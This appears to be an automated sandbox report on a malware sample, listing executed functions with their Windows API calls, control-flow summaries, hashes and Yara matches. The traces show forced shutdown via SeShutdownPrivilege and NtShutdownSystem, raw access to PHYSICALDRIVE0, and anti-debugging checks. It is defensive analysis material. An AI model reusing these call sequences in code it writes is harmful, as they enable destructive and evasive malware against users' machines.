                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_3140000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                                                                                  • String ID: `
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 544645111-2679148245
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 93a9636f9859b9936bec72b5e6159afc64ef6c89352b4a021fce63d25602fa7a
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0bcab94151b697019bd65460b71653ac76e5f16181f440a728308eeba9548302
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 93a9636f9859b9936bec72b5e6159afc64ef6c89352b4a021fce63d25602fa7a
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A94172B5E006289FDB54CF58C880B89FBB1FF48314F1581A9C909AB356D731AE91CF91
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 03141000 Relevance: 1.3, APIs: 1, Instructions: 85memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.2443758923.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_3140000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d47ea729d9c1c00bce13a8c6bff0ccabb7d58ca647283fb10261861a67b7864d
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a1f98554c49d251a82717aefa0d27980546be105368687bc9dd4cd24b60349d1
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d47ea729d9c1c00bce13a8c6bff0ccabb7d58ca647283fb10261861a67b7864d
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CB41F3B49002059FCB44CFA9C5547AEBBF0FF48304F2484AED858AB341D37AA946CF95
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                                                                                                                                  Function 004023F2 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 82librarynativeshutdownCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00402404
                                                                                                                                                                                                                                                                                                                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00402488
                                                                                                                                                                                                                                                                                                                                                                  • AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,?), ref: 004024B4
                                                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(NTDLL.DLL), ref: 004024D2
                                                                                                                                                                                                                                                                                                                                                                  • NtShutdownSystem.NTDLL(00000001), ref: 004024F1
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: LibraryLoad$AdjustLookupPrivilegePrivilegesShutdownSystemTokenValue
                                                                                                                                                                                                                                                                                                                                                                  • String ID: NTDLL.DLL$SeShutdownPrivilege$advapi32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2117616786-2471717051
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e654aa5178626686adecf490f11625747cc8277270b74630ebdda96dc98469bc
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3c0ce9a7761a6e63309c521fc4ca6a6d9466e377a545f21450368ef7aac56ae8
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e654aa5178626686adecf490f11625747cc8277270b74630ebdda96dc98469bc
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F13146B1E10209EBDB04DFE0CD46BEEBB74EB44701F20416AF501B66C0E7795A44CBA5
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00409543 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 78memorylibrarynativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409574
                                                                                                                                                                                                                                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(000000FF,0046C2D0,00000000,00001000,00003000,00000004), ref: 004095E1
                                                                                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(DB51E8EC), ref: 00409610
                                                                                                                                                                                                                                                                                                                                                                  • RtlInitUnicodeString.NTDLL(00000180,00520000), ref: 00409626
                                                                                                                                                                                                                                                                                                                                                                  • RtlInitUnicodeString.NTDLL(00000178,00520000), ref: 0040963C
                                                                                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(DB51E8EC), ref: 00409649
                                                                                                                                                                                                                                                                                                                                                                  • LdrEnumerateLoadedModules.NTDLL(00000000,004050A2,00404393), ref: 0040965A
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CriticalInitSectionStringUnicode$AllocateDirectoryEnterEnumerateLeaveLoadedMemoryModulesVirtualWindows
                                                                                                                                                                                                                                                                                                                                                                  • String ID: explorer.exe
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3728205514-3187896405
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 971d90eb416ca67aafcaf3557b906dfb5bbb6d99924e81ee9f7e95ee9359d988
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d3c5517ac64ebe0f4a93bb8fcf9093c65cacff95b6910bca11f849b0b04bbd4d
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 971d90eb416ca67aafcaf3557b906dfb5bbb6d99924e81ee9f7e95ee9359d988
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F3195B5940208EBC704DF90DCC5FA97775AB48305F1081BAFA05672D1E7B8AE85CB5D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00408958 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 71 408958-4089db CreateFileA DeviceIoControl 72 4047e0-4047ed FindCloseChangeNotification 71->72 73 4089e1-4089e5 71->73 73->72 74 4089eb-408a08 73->74 74->72
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 004047E4
                                                                                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNELBASE(\\.\C:,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00408972
                                                                                                                                                                                                                                                                                                                                                                  • DeviceIoControl.KERNELBASE(?,00560000,00000000,00000000,?,00000020,?,00000000), ref: 00408994
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ChangeCloseControlCreateDeviceFileFindNotification
                                                                                                                                                                                                                                                                                                                                                                  • String ID: \\.\C:$\\.\PHYSICALDRIVE0
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1020254441-2160117148
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 320e27fcbf62a17e998bc26e42cf0c1a2d27fdc4df0059520f6dda202d1693b9
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6179182b2b83b9443c5bd9d33f461fa1aeab268a59a3a7b7debce46551af33e6
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 320e27fcbf62a17e998bc26e42cf0c1a2d27fdc4df0059520f6dda202d1693b9
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AF216D38640348EFD718CF68ED45F99BBB4EB48701F10C1AAE905AB3E1D6B49B40CB58
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040895B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 75 40895b-4089db CreateFileA DeviceIoControl 76 4047e0-4047ed FindCloseChangeNotification 75->76 77 4089e1-4089e5 75->77 77->76 78 4089eb-408a08 77->78 78->76
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 004047E4
                                                                                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNELBASE(\\.\C:,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00408972
                                                                                                                                                                                                                                                                                                                                                                  • DeviceIoControl.KERNELBASE(?,00560000,00000000,00000000,?,00000020,?,00000000), ref: 00408994
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ChangeCloseControlCreateDeviceFileFindNotification
                                                                                                                                                                                                                                                                                                                                                                  • String ID: \\.\C:$\\.\PHYSICALDRIVE0
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1020254441-2160117148
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6e1c8ed08f6fcb21cf0fed49fef2ed80236c62ed62855b81c13f5c76d91f0969
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 711083b2bbb86b7d36e7a7c78397dedf6b4307ebbdc5261e1e4f3fe33cb2826c
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e1c8ed08f6fcb21cf0fed49fef2ed80236c62ed62855b81c13f5c76d91f0969
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6F215C38600308AFD718CF58DC46F99BBB4AB48701F10C0AAE905AB3E1D6B4AA40CB58
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00408951 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 56fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 79 408951-4089db CreateFileA DeviceIoControl 81 4047e0-4047ed FindCloseChangeNotification 79->81 82 4089e1-4089e5 79->82 82->81 83 4089eb-408a08 82->83 83->81
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 004047E4
                                                                                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNELBASE(\\.\C:,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00408972
                                                                                                                                                                                                                                                                                                                                                                  • DeviceIoControl.KERNELBASE(?,00560000,00000000,00000000,?,00000020,?,00000000), ref: 00408994
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ChangeCloseControlCreateDeviceFileFindNotification
                                                                                                                                                                                                                                                                                                                                                                  • String ID: \\.\C:$\\.\PHYSICALDRIVE0
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1020254441-2160117148
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 43b5c774c06db54b38c673015130514d13990ffabb50efddd8f557c0ac6fe542
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 389e508c5a35674a8dec956cf5ed0ace9ff19c3110c7d277eeff61c57732489a
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 43b5c774c06db54b38c673015130514d13990ffabb50efddd8f557c0ac6fe542
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 79216D78604348EFD708CF58E855BA9BBB4EB48711F10C1AAE905AB3E1D7B49B40CB59
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00401B2C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39nativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 193 401b2c-401b36 194 402a85-402ab5 call 40335c NtQueryInformationProcess 193->194 195 401b3c-401b3e 193->195 199 401fe6-401fe8 194->199 200 402abb-402ac3 194->200 196 40844c-40844f 195->196 199->196 201 40bda2 200->201 202 402ac9-409df6 200->202 202->196
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • NtQueryInformationProcess.NTDLL(00000000,00000000,00000020,00000020,00000000), ref: 00402AA8
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: InformationProcessQuery
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1778838933-3916222277
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 99cf6030004cc14fcfbf758772858fa4ef28e9fcd54024a0ddfc1a5f41bc18d2
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b5fb0c1052741472a29b3626a296402ee31a9556d555090f334d473f401f16ea
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 99cf6030004cc14fcfbf758772858fa4ef28e9fcd54024a0ddfc1a5f41bc18d2
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E01A471D04308FBDB00DF90C98A7EDBBB8AB05314F24506AE540772C1E7BC9685A75A
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040AEA4 Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 204 40aea4-40aec0 GetPEB call 40d1f6 207 401bd2-401bd9 call 40c13c 204->207 208 40aec6 call 404369 204->208 213 4044bc-4044c3 call 403aee 207->213 214 401bdf 207->214 212 40aecb 208->212 212->207 218 4044c9 213->218 219 40a95e-40a96a call 4043ad call 407d21 213->219 215 40bfa2-40bfa5 214->215 218->215 224 40a970-40a97b Sleep call 4023f2 219->224 225 402b44-402b46 ExitProcess 219->225 227 40a980 224->227 227->225
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Module$FileHandleInitializeLibraryLoadName
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1691763914-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7a2ac303de4b0b2ba4ade585fa2e29916ceed782501468d31b7631315bf6b27d
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b20ac1345fbffd2ee6b09d0fcfa97f88ae309217d757d61775f2d603f36cc11d
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a2ac303de4b0b2ba4ade585fa2e29916ceed782501468d31b7631315bf6b27d
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0BF0BE70608345D6C6047FB38E4672A76B8AF0030DF10407FFD02B62D2EA7E9A11559F
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00407D21 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00407D33
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2050909247-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5469e9984ee0613fe67692c8399fce14f271ad5feb70d4257aac3e9e61b94720
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2d0ccdd24a91546423dca3ee3cf720458c613a0087a6006a7f2d7a66fbfa4b10
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5469e9984ee0613fe67692c8399fce14f271ad5feb70d4257aac3e9e61b94720
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4CF065B4D00348EFC704EFA599896ADBBB4AB04701F10857AE85277395E2BC5644CF9A
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040E52B Relevance: 21.1, APIs: 11, Strings: 3, Instructions: 60memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 0 40e52b-40e632 LocalAlloc * 11
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNELBASE(00000040,00004000,004046B5,?,0040C145,004046B5,?,00401BD7), ref: 0040E53D
                                                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00004000,?,0040C145,004046B5,?,00401BD7), ref: 0040E54F
                                                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00004000,?,0040C145,004046B5,?,00401BD7), ref: 0040E561
                                                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00001000,?,0040C145,004046B5,?,00401BD7), ref: 0040E573
                                                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00001000,?,0040C145,004046B5,?,00401BD7), ref: 0040E585
                                                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00008000,?,0040C145,004046B5,?,00401BD7), ref: 0040E597
                                                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00008004,?,0040C145,004046B5,?,00401BD7), ref: 0040E5A9
